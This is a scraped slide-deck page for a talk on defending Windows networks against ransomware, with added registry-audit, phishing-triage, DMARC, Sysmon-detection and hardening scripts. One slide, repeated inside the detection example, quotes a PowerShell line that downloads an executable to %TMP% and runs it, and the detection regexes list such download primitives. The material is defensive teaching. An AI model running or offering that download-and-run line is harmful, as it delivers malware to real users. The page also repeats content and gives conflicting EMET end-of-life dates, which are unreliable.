Ransomware 0: Admins 1
Kieran Jacobsen
Kieran Jacobsen
• Work at Readify
• Technical Lead
• Twitter: @Kjacobsen
• Poshsecurity.com
• PlanetPowerShell.com
What Is Ransomware?
The impact of ransomware
[Bar chart: percentage scale 0% to 100%; individual values are not recoverable from the slide text]
Source: CyberEdge
Threat Hierarchy
1. Malware (viruses, worms, trojans).
2. Phishing.
3. Insider threats.
4. APT.
5. Ransomware.
6. Web application attacks.
7. SSL-encrypted threats.
8. DoS/DDoS.
9. Drive-by & watering-hole.
Source: CyberEdge
Impacted Verticals
[Bar chart: percentage scale 0% to 80%; verticals shown: Technology, Financial Services, Healthcare, Government; values are not recoverable from the slide text]
Source: CyberEdge
The Rising Cost of Ransomware
Bitcoin Exchange Rate (USD)
How Does it Get in?
[Bar chart: percentage scale 0% to 35%; infection vectors shown: Email link, Email attachment, Website (non-social media), Social media, USB stick, Business application, Unknown; values are not recoverable from the slide text]
Source: Osterman Research
An Example Attack
cmd /c PowerShell (New-Object System.Net.WebClient).DownloadFile('http://<omitted>/2011/stinfo.pdf','%TMP%yvatu.exe');Start-Process '%TMP%yvatu.exe'
Reducing the Risks
1. Disable macros
• Significantly impacts infection chain.
• 31% of ransomware infections came from email attachments, typically a Word document with macros.
• Either:
• Disable All
• Disable macros marked as from the internet
• https://decentsecurity.com/enterprise/#/block-office-macros/
2. Don’t run as admin
• Significantly impacts infection chain.
• Rethink developer and sysadmin privileges.
• Old rant by Jeff Atwood: https://blog.codinghorror.com/the-windows-security-epidemic-dont-run-as-an-administrator/
3. Configure UAC
• UAC elevation requests are passed to the Antimalware Scan Interface (AMSI).
• https://www.tenforums.com/tutorials/3577-change-user-account-control-uac-settings-windows-10-a.html
4. Open scripts in notepad
• .ps1 files do not execute when double-clicked.
• Change the following to open in notepad:
• .bat (often overlooked)
• .vbe and .vbs
• .wsh and .wsf
• .js and .jse
• http://www.dankalia.com/tutor/01002/0100201018.htm
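The three settings above (macro policy, UAC prompting, script file associations) all live in the registry, so they can be audited from a `reg export`. As an added example that is not part of the talk, this Python parses a constructed .reg export and reports where it falls short of sections 1, 3 and 4; the key paths and value names are the standard Office policy, UAC policy and ProgID locations, and the sample values are constructed.

```python
"""Audit a .reg export against the settings behind sections 1, 3 and 4 of the talk:
Office macro policy, UAC prompting and script file associations.
Added example, not from the talk; the export below is constructed."""
import re
from typing import Dict, List, Tuple

# Constructed `reg export` output: Word blocks internet macros but allows local ones,
# admins elevate silently, and only VBSFile has been pointed at notepad.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Word\Security]
"VBAWarnings"=dword:00000002
"blockcontentexecutionfrominternet"=dword:00000001

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]
"EnableLUA"=dword:00000001
"ConsentPromptBehaviorAdmin"=dword:00000000
"PromptOnSecureDesktop"=dword:00000001

[HKEY_CLASSES_ROOT\batfile\shell\open\command]
@="\"%1\" %*"

[HKEY_CLASSES_ROOT\VBSFile\Shell\Open\Command]
@="C:\\Windows\\System32\\notepad.exe \"%1\""

[HKEY_CLASSES_ROOT\JSFile\Shell\Open\Command]
@="C:\\Windows\\System32\\WScript.exe \"%1\" %*"
"""

OFFICE_SECURITY = r"hkey_current_user\software\policies\microsoft\office\16.0\word\security"
UAC_POLICY = r"hkey_local_machine\software\microsoft\windows\currentversion\policies\system"
# ProgIDs for the script types in section 4; their shell\open\command should be notepad
SCRIPT_PROGIDS = ["batfile", "VBSFile", "VBEFile", "JSFile", "JSEFile", "WSFFile", "WSHFile"]

_KEY_RE = re.compile(r"^\[(.+)\]$")
_VALUE_RE = re.compile(r'^(@|"((?:[^"\\]|\\.)*)")=(.*)$')


def _unescape(text: str) -> str:
    """.reg files escape backslash and double quote with a backslash."""
    return re.sub(r'\\(["\\])', r"\1", text)


def parse_reg(text: str) -> Dict[str, Dict[str, object]]:
    """Return {key_path: {value_name: value}} with the default value (@) named ''.
    Paths and names are lower-cased (the registry is case-insensitive). dword: and
    quoted strings are decoded; other types stay raw and hex continuation lines are skipped."""
    keys: Dict[str, Dict[str, object]] = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("Windows Registry Editor") or line.startswith(";"):
            continue
        key_match = _KEY_RE.match(line)
        if key_match:
            current = key_match.group(1).lower()
            keys[current] = {}
            continue
        value_match = _VALUE_RE.match(line)
        if value_match and current is not None:
            name = "" if value_match.group(1) == "@" else _unescape(value_match.group(2)).lower()
            data = value_match.group(3)
            if data.lower().startswith("dword:"):
                value: object = int(data[6:], 16)
            elif len(data) >= 2 and data.startswith('"') and data.endswith('"'):
                value = _unescape(data[1:-1])
            else:
                value = data
            keys[current][name] = value
    return keys


def check_baseline(reg: Dict[str, Dict[str, object]]) -> List[Tuple[str, str]]:
    """Return (area, finding) pairs for each setting that misses the talk's advice."""
    findings: List[Tuple[str, str]] = []
    office = reg.get(OFFICE_SECURITY, {})
    # Section 1: either disable all macros (VBAWarnings=4) or block the ones the
    # Mark-of-the-Web says came from the internet (blockcontentexecutionfrominternet=1).
    if office.get("vbawarnings") != 4 and office.get("blockcontentexecutionfrominternet") != 1:
        findings.append(("macros", "Word runs macros in documents from the internet"))
    uac = reg.get(UAC_POLICY, {})
    # Section 3: UAC on, and admins actually prompted (0 = elevate without prompting).
    if uac.get("enablelua") != 1:
        findings.append(("uac", "UAC is disabled (EnableLUA != 1)"))
    elif uac.get("consentpromptbehavioradmin") == 0:
        findings.append(("uac", "admins elevate without a prompt (ConsentPromptBehaviorAdmin = 0)"))
    # Section 4: double-clicking a script should open it in notepad, not run it.
    for progid in SCRIPT_PROGIDS:
        key = "hkey_classes_root\\" + progid.lower() + "\\shell\\open\\command"
        command = reg.get(key, {}).get("")
        if command is None:
            findings.append(("scripts", f"{progid}: open command not present in export"))
        elif "notepad.exe" not in str(command).lower():
            findings.append(("scripts", f"{progid}: double-click runs {command}"))
    return findings
```

On the sample, `check_baseline(parse_reg(SAMPLE_REG))` reports the silent admin elevation and every script type still wired to its interpreter or absent from the export; the macro check passes because blockcontentexecutionfrominternet is set even though VBAWarnings is only 2.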
5a. EMET
• Enhanced Mitigation Experience Toolkit – New EOL date 2018-08-31.
• Applies security mitigation technologies to running applications:
DEP, SEHOP, Null Page, Heap Spray, EAF, EAF+, Mandatory ASLR, Bottom Up ASLR, Load Lib,
Memory Protection, Caller, Sim Exec Flow, Stack Pivot, ASR
• Provides configurable SSL/TLS certificate pinning.
• Provides ability to block untrusted fonts.
• Group Policy ADM/ADMX files.
• Bundled with recommended protections for a variety of Microsoft and 3rd Party Apps.
• Disable protections on Chrome due to conflicts.
• http://www.zdnet.com/article/emet-your-enterprise-for-peak-windows-security/
5b. Inbuilt protections in Windows 10
• Windows:
• Windows 10, version 1607 and later
• Windows Server 2016
• On for all 64-bit processes: DEP, SEHOP and ASLR.
• Configurable protections:
DEP, DEP-ATL Thunk, SEHOP, Mandatory ASLR, Bottom Up ASLR
• Configurable by, well, Group Policy.
• https://technet.microsoft.com/en-us/itpro/windows/keep-secure/override-mitigation-options-for-app-related-security-policies?f=255&MSPPError=-2147217396
6. Deploy Chrome and Firefox
• Reduces issues caused by users attempting to install 3rd party browsers.
• Chrome is the leader of the pack, followed by Edge for security.
• Chrome has ADM/ADMX files for Group Policy; Firefox has 3rd party Group Policy support.
• Chrome: http://goo.gl/2QvOT
• Firefox: https://developer.mozilla.org/en-US/Firefox/Enterprise_deployment
7. Block Ads
• Internet Explorer: https://decentsecurity.com/adblocking-for-internet-explorer-deployment/
• Edge: https://www.microsoft.com/en-us/store/p/adblock/9nblggh4rfhk
• Chrome: https://decentsecurity.com/ublock-for-google-chrome-deployment/
• Firefox: https://decentsecurity.com/ublock-for-firefox-deployment/
8. Filter common email attacks
• Identify common phrases and syntax in phishing and ransomware emails.
• Quarantine them before they get to your users.
• https://github.com/SwiftOnSecurity/PhishingRegex
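As an added example (not from the talk and not the SwiftOnSecurity rule set linked above), this Python applies constructed regexes for lure phrasing and for attachment types that run when double-clicked to a constructed MIME message, scores it, and decides whether it should be quarantined before reaching the user:

```python
"""Regex-based triage of inbound mail for the phrases and attachment types
common to phishing and ransomware lures (section 8). Added example, not from
the talk and not the SwiftOnSecurity rule set; patterns and messages are constructed."""
import email
import re
from email import policy
from typing import List, Tuple

# Constructed text rules: (name, pattern, weight). DOTALL lets the "within 40
# characters" windows span line breaks in the body.
TEXT_RULES = [
    ("enable_macros", re.compile(r"\benable\s+(content|macros|editing)\b", re.I), 3),
    ("invoice_lure", re.compile(r"\b(invoice|payment|remittance|receipt)\b.{0,40}\b(attached|overdue|due)\b", re.I | re.S), 2),
    ("account_threat", re.compile(r"\b(account|mailbox|password)\b.{0,40}\b(suspend|expire|locked|verify)\w*", re.I | re.S), 2),
    ("urgency", re.compile(r"\b(urgent|immediately|within\s+24\s+hours|final\s+notice)\b", re.I), 1),
]
# Attachment extensions that run code or carry macros when a user double-clicks them
RISKY_EXT = re.compile(r"\.(docm?|xlsm?|pptm?|js|jse|vbs|vbe|wsf|wsh|hta|zip)$", re.I)
ATTACHMENT_WEIGHT = 3
QUARANTINE_AT = 4


def score_message(raw: str) -> Tuple[int, List[str], bool]:
    """Parse one RFC 5322 message and return (score, rule hits, quarantine?)."""
    msg = email.message_from_string(raw, policy=policy.default)
    body_part = msg.get_body(preferencelist=("plain", "html"))
    body = body_part.get_content() if body_part is not None else ""
    text = f"{msg.get('Subject', '')}\n{body}"
    score, hits = 0, []
    for name, pattern, weight in TEXT_RULES:
        if pattern.search(text):
            hits.append(name)
            score += weight
    for part in msg.iter_attachments():
        filename = part.get_filename() or ""
        if RISKY_EXT.search(filename):
            hits.append(f"attachment:{filename}")
            score += ATTACHMENT_WEIGHT
    return score, hits, score >= QUARANTINE_AT


# Constructed lure: invoice pretext, "Enable Content" instruction, macro-enabled attachment
PHISH = """\
From: "Accounts Payable" <accounts@example.net>
To: alice@example.com
Subject: Invoice 4471 overdue - action required
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/plain; charset="utf-8"

Please see the attached invoice. Open the document and click Enable Content
to view it. Payment is due immediately.

--b1
Content-Type: application/octet-stream; name="invoice_4471.docm"
Content-Disposition: attachment; filename="invoice_4471.docm"
Content-Transfer-Encoding: base64

ZmFrZQ==
--b1--
"""

# Constructed benign message for comparison
BENIGN = """\
From: Sam <sam@example.com>
To: alice@example.com
Subject: Lunch on Thursday?
Content-Type: text/plain; charset="utf-8"

Are you free Thursday? The new place on the corner has opened.
"""

if __name__ == "__main__":
    for name, raw in (("phish", PHISH), ("benign", BENIGN)):
        print(name, score_message(raw))
```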
9. Enable SPF, DKIM and DMARC
• SPF: Domain owner specifies the servers allowed to send its email.
• DKIM: A domain asserts responsibility for the emails it sends.
• DMARC: Combines SPF + DKIM; allows policy assertions and collection of data.
• https://dmarc.org/presentations/Email-Authentication-Basics-2015Q2.pdf
9. Enable SPF, DKIM and DMARC
[Chart: Alexa Top 500 - DMARC usage, split into DMARC vs No DMARC; proportions are not recoverable from the slide text]
Source: Detectify
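To make the three records concrete, here is an added example that is not part of the talk: parsing a constructed SPF and DMARC record for example.com and running the DMARC alignment decision for three constructed messages, including a spoof that passes SPF for the sender's own domain but fails alignment with the From header. The organizational-domain lookup is simplified to the last two labels.

```python
"""Parse SPF and DMARC TXT records and apply the DMARC alignment decision from
section 9. Added example, not from the talk; the records and the message
authentication results below are constructed."""
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# Constructed records published by example.com
SPF_RECORD = "v=spf1 ip4:203.0.113.0/24 include:_spf.example.net -all"
DMARC_RECORD = "v=DMARC1; p=reject; sp=quarantine; adkim=s; aspf=r; rua=mailto:dmarc-reports@example.com"


def parse_spf(record: str) -> Dict[str, object]:
    """Split an SPF record into (qualifier, mechanism) pairs plus the qualifier on
    'all': '-' hard-fails unlisted senders, '~' only soft-fails them."""
    terms = record.split()
    if not terms or terms[0].lower() != "v=spf1":
        raise ValueError("not an SPF record")
    mechanisms: List[Tuple[str, str]] = []
    all_qualifier: Optional[str] = None
    for term in terms[1:]:
        qualifier = "+"
        if term[0] in "+-~?":
            qualifier, term = term[0], term[1:]
        if term.lower() == "all":
            all_qualifier = qualifier
        elif "=" not in term:  # modifiers such as redirect= are not mechanisms
            mechanisms.append((qualifier, term))
    return {"mechanisms": mechanisms, "all": all_qualifier}


def parse_dmarc(record: str) -> Dict[str, str]:
    """Parse DMARC tag=value pairs and fill the defaults: relaxed alignment and a
    subdomain policy (sp) equal to p when none is published."""
    tags: Dict[str, str] = {}
    for part in record.split(";"):
        if "=" in part:
            key, value = part.split("=", 1)
            tags[key.strip().lower()] = value.strip()
    if tags.get("v") != "DMARC1" or tags.get("p") not in ("none", "quarantine", "reject"):
        raise ValueError("not a valid DMARC record")
    tags.setdefault("adkim", "r")
    tags.setdefault("aspf", "r")
    tags.setdefault("sp", tags["p"])
    return tags


def org_domain(domain: str) -> str:
    """Simplified to the last two labels for this example; a real implementation
    derives the organizational domain from the Public Suffix List."""
    return ".".join(domain.lower().rstrip(".").split(".")[-2:])


def aligned(auth_domain: Optional[str], from_domain: str, mode: str) -> bool:
    """Strict (s) alignment needs an exact match; relaxed (r) accepts the same org domain."""
    if not auth_domain:
        return False
    if mode == "s":
        return auth_domain.lower() == from_domain.lower()
    return org_domain(auth_domain) == org_domain(from_domain)


@dataclass
class AuthResults:
    from_domain: str           # domain in the RFC5322.From header the user sees
    spf_result: str            # "pass", "fail", "softfail", "none", ...
    spf_domain: Optional[str]  # RFC5321.MailFrom domain SPF was evaluated for
    dkim_result: str
    dkim_domain: Optional[str]  # d= of the signature that verified


def dmarc_disposition(results: AuthResults, dmarc: Dict[str, str], record_domain: str) -> Dict[str, object]:
    """DMARC passes if SPF or DKIM passed *and* that identifier aligns with the From
    domain; otherwise p (or sp for a subdomain From) is the requested disposition."""
    spf_ok = results.spf_result == "pass" and aligned(results.spf_domain, results.from_domain, dmarc["aspf"])
    dkim_ok = results.dkim_result == "pass" and aligned(results.dkim_domain, results.from_domain, dmarc["adkim"])
    passed = spf_ok or dkim_ok
    policy = dmarc["p"] if results.from_domain.lower() == record_domain.lower() else dmarc["sp"]
    return {"spf_aligned": spf_ok, "dkim_aligned": dkim_ok,
            "dmarc": "pass" if passed else "fail", "disposition": "none" if passed else policy}


# Constructed scenarios: a spoof that passes SPF for the attacker's own domain,
# a legitimate message, and a subdomain sender whose DKIM d= fails strict alignment.
SPOOFED = AuthResults("example.com", "pass", "bulk-sender.example", "none", None)
LEGIT = AuthResults("example.com", "pass", "mail.example.com", "pass", "example.com")
SUBDOMAIN = AuthResults("news.example.com", "fail", "news.example.com", "pass", "example.com")

if __name__ == "__main__":
    dmarc_policy = parse_dmarc(DMARC_RECORD)
    for name, case in (("spoofed", SPOOFED), ("legit", LEGIT), ("subdomain", SUBDOMAIN)):
        print(name, dmarc_disposition(case, dmarc_policy, "example.com"))
```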
10. Implement SYSMON
Sysmon from Microsoft ( https://technet.microsoft.com/en-us/sysinternals/sysmon )
+
Configuration from Swift on Security ( https://github.com/SwiftOnSecurity/sysmon-config/ )
+
Free SIEM from Gray Log ( https://www.graylog.org/ )
+
Sysmon for Graylog ( https://github.com/ion-storm/Graylog_Sysmon )
=
Awesome Dashboard
10. Implement SYSMON
Source: @ionstorm
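The Sysmon + Graylog stack above is where the chain from "An Example Attack" (Word spawning cmd, a PowerShell download cradle, an executable in %TMP%) becomes visible. As an added example that is not part of the talk or of the linked Sysmon configurations, this Python runs three detections over constructed Sysmon Event ID 1 records (field names are Sysmon's; the GUIDs, paths and benign processes are constructed, and the attack command line is the one shown earlier in the deck) and reconstructs the parent chain behind the payload:

```python
"""Detection logic over Sysmon Event ID 1 (process creation) records for the
infection chain shown in "An Example Attack": Word -> cmd -> PowerShell download
cradle -> executable in %TMP%. Added example, not from the talk or the
SwiftOnSecurity/ion-storm configurations; the events below are constructed."""
import re
from typing import Dict, List, Tuple

OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe", "rundll32.exe"}
# Download-and-execute primitives commonly seen in one-line PowerShell stagers
CRADLE = re.compile(
    r"net\.webclient|downloadfile|downloadstring|invoke-webrequest|\biwr\b|"
    r"invoke-expression|\biex\b|start-bitstransfer|-enc(odedcommand)?\b|frombase64string", re.I)
TEMP_PATH = re.compile(r"%TMP%|%TEMP%|\\AppData\\Local\\Temp\\", re.I)


def ev(guid: str, parent_guid: str, image: str, command_line: str, parent_image: str) -> Dict[str, str]:
    """Build a record with the Sysmon Event ID 1 field names used below."""
    return {"ProcessGuid": guid, "ParentProcessGuid": parent_guid, "Image": image,
            "CommandLine": command_line, "ParentImage": parent_image}


# Constructed events: the chain from the talk's example plus two benign processes.
# explorer.exe has no event of its own, so reconstructed chains stop at WINWORD.EXE.
EVENTS = [
    ev("{g-word}", "{g-explorer}", r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
       r'"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE" /n "C:\Users\alice\Downloads\stinfo.doc"',
       r"C:\Windows\explorer.exe"),
    ev("{g-cmd}", "{g-word}", r"C:\Windows\System32\cmd.exe",
       "cmd /c PowerShell (New-Object System.Net.WebClient).DownloadFile('http://<omitted>/2011/stinfo.pdf',"
       "'%TMP%yvatu.exe');Start-Process '%TMP%yvatu.exe'",
       r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE"),
    ev("{g-ps}", "{g-cmd}", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
       "PowerShell (New-Object System.Net.WebClient).DownloadFile('http://<omitted>/2011/stinfo.pdf',"
       "'%TMP%yvatu.exe');Start-Process '%TMP%yvatu.exe'",
       r"C:\Windows\System32\cmd.exe"),
    ev("{g-payload}", "{g-ps}", r"C:\Users\alice\AppData\Local\Temp\yvatu.exe",
       r'"C:\Users\alice\AppData\Local\Temp\yvatu.exe"',
       r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"),
    ev("{g-ps-admin}", "{g-explorer}", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
       r"powershell.exe -File C:\Scripts\Backup.ps1", r"C:\Windows\explorer.exe"),
    ev("{g-chrome}", "{g-explorer}", r"C:\Program Files\Google\Chrome\Application\chrome.exe",
       r'"C:\Program Files\Google\Chrome\Application\chrome.exe"', r"C:\Windows\explorer.exe"),
]


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def process_chain(guid: str, by_guid: Dict[str, Dict[str, str]]) -> List[str]:
    """Walk ParentProcessGuid links back to the oldest ancestor we have an event for."""
    chain, seen = [], set()
    while guid in by_guid and guid not in seen:
        seen.add(guid)
        chain.append(basename(by_guid[guid]["Image"]))
        guid = by_guid[guid]["ParentProcessGuid"]
    return list(reversed(chain))


def detect(events: List[Dict[str, str]]) -> List[Tuple[str, str, str]]:
    """Return (ProcessGuid, rule, detail) for every event that matches a rule."""
    by_guid = {e["ProcessGuid"]: e for e in events}
    alerts: List[Tuple[str, str, str]] = []
    for e in events:
        image, parent = basename(e["Image"]), basename(e["ParentImage"])
        # Section 1's macro chain: an Office application starting a script host or shell
        if parent in OFFICE and image in SHELLS:
            alerts.append((e["ProcessGuid"], "office_spawns_shell", f"{parent} -> {image}"))
        # The stager itself, whether logged on cmd.exe or on the PowerShell child
        cradle = CRADLE.search(e["CommandLine"])
        if cradle:
            alerts.append((e["ProcessGuid"], "download_cradle", cradle.group(0)))
        # A fresh executable in the user's Temp directory with an Office ancestor
        if image.endswith(".exe") and TEMP_PATH.search(e["Image"]):
            chain = process_chain(e["ProcessGuid"], by_guid)
            if OFFICE & set(chain):
                alerts.append((e["ProcessGuid"], "temp_exe_from_office_chain", " -> ".join(chain)))
    return alerts


if __name__ == "__main__":
    for guid, rule, detail in detect(EVENTS):
        print(f"{rule:28} {guid:14} {detail}")
```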
Thank You
www.expertslive.org.au
#expertsliveau

[BuildWithAI] Introduction to Gemini.pdf[BuildWithAI] Introduction to Gemini.pdf
[BuildWithAI] Introduction to Gemini.pdf
 
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ..."I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...
 
Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...
Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...
Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...
 

Ransomware 0 admins 1

  • 1. Ransomware 0: Admins 1. Kieran Jacobsen.
  • 2. Kieran Jacobsen: Technical Lead at Readify. Twitter: @Kjacobsen. Poshsecurity.com, PlanetPowerShell.com.
  • 4. The impact of ransomware (bar chart, 0-100% scale; source: CyberEdge).
  • 5. Threat hierarchy: 1. Malware (viruses, worms, trojans). 2. Phishing. 3. Insider threats. 4. APT. 5. Ransomware. 6. Web application attacks. 7. SSL-encrypted threats. 8. DoS/DDoS. 9. Drive-by and watering-hole. Source: CyberEdge.
  • 6. Impacted verticals (bar chart, 0-80% scale: Technology, Financial Services, Healthcare, Government; source: CyberEdge).
  • 7. The rising cost of ransomware (chart: Bitcoin exchange rate, USD).
  • 8. How does it get in? (bar chart, 0-35% scale; source: Osterman Research). Vectors: Email link, Email attachment, Website (non-social media), Social Media, USB stick, Business application, Unknown.
  • 17. An example attack: cmd /c PowerShell (New-Object System.Net.WebClient).DownloadFile('http://<omitted>/2011/stinfo.pdf','%TMP%yvatu.exe');Start-Process '%TMP%yvatu.exe'
  • 21. 1. Disable macros
    • Significantly impacts the infection chain.
    • 31% of ransomware infections came from email attachments, typically a Word document with macros.
    • Either:
      • Disable all macros, or
      • Disable macros marked as from the internet.
    • https://decentsecurity.com/enterprise/#/block-office-macros/
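The two options on this slide map to two values under the Office policy registry keys, which is what the Group Policy templates write. The script below is an added example (the editor's, not from the deck or from decentsecurity.com) that sets either option for the current user and then reads back what is in effect; it assumes Office 2013/2016/365 (version keys 15.0 and 16.0), with 14.0 included only for the VBAWarnings setting because Office 2010 predates the "block from the Internet" policy.

```powershell
# Added example (editor's, not from the deck): apply the macro policy through the
# registry keys the Office ADMX templates write, so the same values can be pushed by GPO.
function Set-OfficeMacroPolicy {
    [CmdletBinding()]
    param(
        # BlockInternet = "Disable macros marked as from the internet"
        # DisableAll    = "Disable All" (no notification bar, users cannot enable)
        [ValidateSet('BlockInternet', 'DisableAll')]
        [string]$Mode = 'BlockInternet',
        [string[]]$Apps = @('Word', 'Excel', 'PowerPoint'),
        [string[]]$Versions = @('14.0', '15.0', '16.0')
    )

    foreach ($version in $Versions) {
        foreach ($app in $Apps) {
            $key = "HKCU:\Software\Policies\Microsoft\Office\$version\$app\Security"
            if (-not (Test-Path $key)) { New-Item -Path $key -Force | Out-Null }

            if ($Mode -eq 'BlockInternet') {
                # Files carrying the Mark-of-the-Web (Zone.Identifier = 3: downloaded, or
                # saved from a mail attachment) cannot run VBA at all; local files are untouched.
                New-ItemProperty -Path $key -Name 'blockcontentexecutionfrominternet' -PropertyType DWord -Value 1 -Force | Out-Null
            }
            else {
                # VBAWarnings: 1 = enable all, 2 = disable with notification (Office default),
                # 3 = disable all except digitally signed, 4 = disable all without notification.
                New-ItemProperty -Path $key -Name 'VBAWarnings' -PropertyType DWord -Value 4 -Force | Out-Null
            }
        }
    }
}

function Get-OfficeMacroPolicy {
    # Read back what is in effect so the change can be verified after a gpupdate.
    param(
        [string[]]$Apps = @('Word', 'Excel', 'PowerPoint'),
        [string[]]$Versions = @('14.0', '15.0', '16.0')
    )
    foreach ($version in $Versions) {
        foreach ($app in $Apps) {
            $key = "HKCU:\Software\Policies\Microsoft\Office\$version\$app\Security"
            $p = Get-ItemProperty -Path $key -ErrorAction SilentlyContinue
            [pscustomobject]@{
                App               = "$app $version"
                VBAWarnings       = $p.VBAWarnings
                BlockFromInternet = $p.blockcontentexecutionfrominternet
            }
        }
    }
}

Set-OfficeMacroPolicy -Mode BlockInternet
Get-OfficeMacroPolicy | Format-Table -AutoSize
```

Policy keys under HKCU\Software\Policies win over the user's own Trust Center choices, so a user cannot undo this from the Office UI; a Trusted Location still bypasses both settings, so audit those too.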
  • 22. 2. Don't run as admin
    • Significantly impacts the infection chain.
    • Rethink developer and sysadmin privileges.
    • Old rant by Jeff Atwood: https://blog.codinghorror.com/the-windows-security-epidemic-dont-run-as-an-administrator/
  • 24. 3. Configure UAC
    • UAC elevation requests are passed to the Antimalware Scan Interface (AMSI).
    • https://www.tenforums.com/tutorials/3577-change-user-account-control-uac-settings-windows-10-a.html
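A quick audit for the two preceding points, added here as an example (the editor's, not from the deck): it reports whether the current session is already elevated, whether the account is a direct member of the local Administrators group, and compares the UAC policy values against the "Always notify" configuration. The expected values are the editor's recommendation, not numbers from the slides; Get-LocalGroupMember needs Windows 10 / Server 2016 or PowerShell 5.1.

```powershell
# Added example (editor's, not from the deck): admin-membership and UAC audit.
function Get-AdminHygieneReport {
    $identity  = [System.Security.Principal.WindowsIdentity]::GetCurrent()
    $principal = New-Object System.Security.Principal.WindowsPrincipal($identity)

    # True only when the token is already elevated; under UAC, an Administrators
    # member in a normal shell holds a filtered token and sees $false here.
    $elevated = $principal.IsInRole([System.Security.Principal.WindowsBuiltInRole]::Administrator)

    # Direct membership of BUILTIN\Administrators (S-1-5-32-544). Nested domain
    # groups are not expanded, so a $false here is not proof of least privilege.
    $admins = Get-LocalGroupMember -SID 'S-1-5-32-544' -ErrorAction SilentlyContinue | ForEach-Object Name
    $isAdminMember = $admins -contains $identity.Name

    # UAC policy values and what the "Always notify" slider position sets them to.
    $uacKey = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
    $uac = Get-ItemProperty -Path $uacKey
    $expected = @{
        EnableLUA                  = 1  # UAC on at all; 0 switches it off entirely
        ConsentPromptBehaviorAdmin = 2  # consent prompt on every elevation (5 = only for non-Windows binaries)
        PromptOnSecureDesktop      = 1  # prompt on the secure desktop, so malware cannot click it for the user
    }
    $findings = foreach ($name in $expected.Keys) {
        [pscustomobject]@{
            Setting  = $name
            Actual   = $uac.$name
            Expected = $expected[$name]
            Ok       = ($uac.$name -eq $expected[$name])
        }
    }

    [pscustomobject]@{
        User        = $identity.Name
        Elevated    = $elevated
        AdminMember = $isAdminMember
        UacSettings = $findings
    }
}

$report = Get-AdminHygieneReport
$report | Format-List User, Elevated, AdminMember
$report.UacSettings | Format-Table -AutoSize
```

The same three values can be enforced with the Security Options policies under Computer Configuration > Windows Settings > Security Settings > Local Policies; checking the registry as above is the fastest way to confirm the policy actually landed on a given machine.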
  • 25. 4. Open scripts in Notepad
    • .ps1 files do not execute when double-clicked.
    • Change the following to open in Notepad:
      • .bat (often overlooked)
      • .vbe and .vbs
      • .wsh and .wsf
      • .js and .jse
    • http://www.dankalia.com/tutor/01002/0100201018.htm
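The change the slide describes is a rewrite of each file type's "open" verb. The script below is an added example (the editor's, not from the deck or the linked tutorial) that does it machine-wide for the listed extensions and reports what each one now resolves to; .cmd is added because it runs through cmd.exe exactly like .bat, and .ps1 appears in the report only to show the already-safe default. It needs an elevated shell.

```powershell
# Added example (editor's, not from the deck): redirect the double-click verb of
# script file types to Notepad and verify the result.
$notepad    = "`"$env:SystemRoot\system32\notepad.exe`" `"%1`""
$extensions = '.bat', '.cmd', '.vbs', '.vbe', '.js', '.jse', '.wsf', '.wsh'

function Get-ScriptOpenCommand {
    param([string[]]$Extensions)
    foreach ($ext in $Extensions) {
        # HKLM\SOFTWARE\Classes\.ext (default) holds the ProgID, e.g. ".vbs" -> "VBSFile".
        $progId = (Get-ItemProperty -Path "HKLM:\SOFTWARE\Classes\$ext" -ErrorAction SilentlyContinue).'(default)'
        $cmd = $null
        if ($progId) {
            # The "open" verb is what Explorer runs on double-click.
            $cmd = (Get-ItemProperty -Path "HKLM:\SOFTWARE\Classes\$progId\shell\open\command" -ErrorAction SilentlyContinue).'(default)'
        }
        [pscustomobject]@{ Extension = $ext; ProgId = $progId; OpenCommand = $cmd }
    }
}

function Set-ScriptOpenWithNotepad {
    param([string[]]$Extensions)
    foreach ($entry in Get-ScriptOpenCommand -Extensions $Extensions) {
        if (-not $entry.ProgId) {
            Write-Warning "$($entry.Extension): no ProgID registered, skipping"
            continue
        }
        $key = "HKLM:\SOFTWARE\Classes\$($entry.ProgId)\shell\open\command"
        if (-not (Test-Path $key)) { New-Item -Path $key -Force | Out-Null }
        Set-ItemProperty -Path $key -Name '(default)' -Value $notepad
    }
}

Set-ScriptOpenWithNotepad -Extensions $extensions
Get-ScriptOpenCommand -Extensions ($extensions + '.ps1') | Format-Table -AutoSize
```

Two caveats a practitioner should keep in mind. A per-user choice under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\<ext>\UserChoice overrides the machine-wide ProgID, so check for one on machines where the report looks right but double-click still executes. And this only changes what Explorer does; `wscript.exe evil.vbs` or `cmd /c evil.bat` from a macro still runs, which is what the macro, UAC and application-control steps on the other slides are for.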
  • 26. 5a. EMET
    • Enhanced Mitigation Experience Toolkit; end of life extended to 2018-07-31.
    • Applies security mitigation technologies to running applications: DEP, SEHOP, Null Page, Heap Spray, EAF, EAF+, Mandatory ASLR, Bottom-Up ASLR, Load Lib, Memory Protection, Caller, Sim Exec Flow, Stack Pivot, ASR.
    • Provides configurable SSL/TLS certificate pinning.
    • Provides the ability to block untrusted fonts.
    • Group Policy ADM/ADMX files.
